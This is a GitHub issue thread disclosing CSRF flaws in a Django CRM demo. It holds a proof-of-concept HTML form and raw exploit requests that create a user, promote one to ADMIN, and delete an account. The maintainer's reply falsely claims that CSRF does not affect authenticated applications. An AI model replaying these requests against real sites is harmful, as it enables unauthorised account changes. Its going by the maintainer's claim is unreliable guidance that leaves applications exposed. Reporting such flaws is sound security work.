Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF vulnerability almost all forms #68

Closed
abuvanth opened this issue Sep 4, 2018 · 6 comments
Closed

CSRF vulnerability almost all forms #68

abuvanth opened this issue Sep 4, 2018 · 6 comments

Comments

@abuvanth
Copy link

abuvanth commented Sep 4, 2018

For example USer creation form has no csrf token validation, so that attacker can create own account by sending malicious link

POC :

<tr><td>last_name</td><td><input type="text" value="abuthahir++" name="last_name"></td></tr>
<tr><td>username</td><td><input type="text" value="abu" name="username"></td></tr>
<tr><td>email</td><td><input type="text" value="test@gmail.com" name="email"></td></tr>
<tr><td>role</td><td><input type="text" value="" name="role"></td></tr>
<tr><td>password</td><td><input type="text" value="reset!23" name="password"></td></tr>
</table><input type="submit" value="http://django-crm.micropyramid.com/users/create/"></form></html>```




EXPLOIT REQUEST:

POST /users/create/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/create/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Cookie: sessionid=g8up9d4xvqga5rwk1m7f4e4mhxmy111
Connection: close
Upgrade-Insecure-Requests: 1

first_name=syed&last_name=abuthahir++&username=abu&email=test%40gmail.com&role=&password=reset%2123

@abuvanth
Copy link
Author

abuvanth commented Sep 4, 2018

User Edit Form has CSRF

Expoit Request:

POST /users/25/edit/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/25/edit/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: csrftoken=zTfdp0GE2eqwRNnPNqfBX4seYXdFq8j8JtyzmYtaLWu3waAFjyfa7umOscWkO1iQ; sessionid=kta9sxfstfmi6mi2r4vankx5h1zuvvic
Connection: close
Upgrade-Insecure-Requests: 1

first_name=Adam&last_name=Chan&username=adamchan&email=test%40test.com&role=ADMIN

@abuvanth
Copy link
Author

abuvanth commented Sep 4, 2018

CSRF while delete account

Exploit link https://django-crm.micropyramid.com/accounts/123/delete/

@abuvanth
Copy link
Author

abuvanth commented Sep 4, 2018

there is no use if csrf token present in cookie

@abuvanth
Copy link
Author

abuvanth commented Sep 4, 2018

csrf token should be present in form or custom header as well as validate that csrf token on server side before save the forms or delete something.

@abuvanth
Copy link
Author

abuvanth commented Sep 4, 2018

@ashwin31
Copy link
Member

ashwin31 commented Sep 7, 2018

@abuvanth thanks for your observation and there is no chance of CSRF for auth protected applications. CSRF is for something like contact forms which doesn't not need to get authenticated to access.

Read "Am I Vulnerable To 'Cross-Site Request Forgery (CSRF)'?" section in the OWASP link provided by you.

There are very simple scripts we can execute in terminal to get CSRF token and send it back in no time.
Anyway, we will review and add o remove it completely to eliminate these confusions about security.

Thank you.

@ashwin31 ashwin31 closed this as completed Sep 7, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants